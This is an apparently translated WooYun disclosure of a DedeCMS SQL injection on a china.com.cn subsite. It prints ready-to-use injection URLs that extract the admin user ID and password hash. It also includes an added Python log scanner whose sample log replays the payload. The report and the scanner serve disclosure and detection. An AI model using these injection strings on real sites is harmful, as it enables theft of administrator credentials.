
Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2012-09298

Title: SQL injection on a 中国网 (china.com.cn) subsite

Vendor: 中国网 (china.com.cn)

Author: zhk

Submitted: 2012-07-06 18:44

Fixed: 2012-08-20 18:45

Published: 2012-08-20 18:45

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2012-07-06: Details sent to the vendor; awaiting vendor handling
2012-07-11: Vendor confirmed; details visible to the vendor only
2012-07-21: Details disclosed to core white hats and domain experts
2012-07-31: Details disclosed to regular white hats
2012-08-10: Details disclosed to intern white hats
2012-08-20: Details disclosed to the public

Brief description:

SQL injection on a 中国网 (china.com.cn) subsite, with fairly high privileges.
I found it via http://www.wooyun.org/bugs/wooyun-2010-09101; a Rank of 1 there should not be possible.

Detailed description:

It is mainly a DedeCMS vulnerability.
http://zy.china.com.cn/
http://zy.china.com.cn/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
21232f297a57a5a743894a0e4a801f=>admin
http://zy.china.com.cn/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
7b1+4ec5112b985e5f19+6=>?
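As an added example (not part of the original report and not DedeCMS code), the following Python script scans web-server access-log lines for requests to member/ajax_membergroup.php whose membergroup parameter carries SQL syntax, which is the injection pattern shown in the URLs above. The log lines, timestamps and IP addresses are constructed for illustration; the assumed log format is Common Log Format.

```python
"""Detect the DedeCMS member/ajax_membergroup.php injection pattern in access logs.

Added example, not from the original report. It parses Common Log Format
lines, URL-decodes the query string and flags requests whose `membergroup`
parameter contains SQL syntax (backticks, UNION/SELECT, the `#@__` table
prefix placeholder). Sample log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common Log Format: host ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Fragments that should never appear in a legitimate membergroup value
# (assumption: legitimate values are plain group identifiers).
SQL_MARKERS = re.compile(r"`|\bunion\b|\bselect\b|#@__", re.IGNORECASE)

TARGET_SUFFIX = "/member/ajax_membergroup.php"


def is_membergroup_injection(request_path: str) -> bool:
    """Return True if the request targets ajax_membergroup.php with SQL in membergroup."""
    parts = urlsplit(request_path)
    if not parts.path.endswith(TARGET_SUFFIX):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("membergroup", []):
        # parse_qs decoded once; decode again so a double-encoded value is
        # still inspected in its final form.
        decoded = unquote(value)
        if SQL_MARKERS.search(decoded):
            return True
    return False


def scan_log(log_text: str) -> list:
    """Return one dict per suspicious request; lines that do not parse are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        if is_membergroup_injection(m.group("path")):
            hits.append({"host": m.group("host"), "time": m.group("time"),
                         "path": m.group("path")})
    return hits


# Constructed sample log: one benign request, one carrying the injection
# pattern from the report, one unrelated request, one malformed line.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jul/2012:18:40:01 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=3 HTTP/1.1" 200 512
203.0.113.7 - - [06/Jul/2012:18:41:13 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'` HTTP/1.1" 200 640
203.0.113.9 - - [06/Jul/2012:18:42:30 +0800] "GET /index.php HTTP/1.1" 200 10240
not a log line
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['host']} {hit['path']}")
```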

Proof of vulnerability:



Fix recommendation:

Upgrade the software.

Copyright notice: when reposting, please credit the source, zhk@WooYun.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2012-07-11 13:53

Vendor reply:

CNVD confirmed and reproduced the described situation; CNVD will contact the affected organization directly for handling (an earlier suspected vulnerability incident was raised with them, which that organization later confirmed to be normal functionality).
Scored by security impact on confidentiality: rank=7.79*1.0*1.1=8.596

Latest status:

None yet

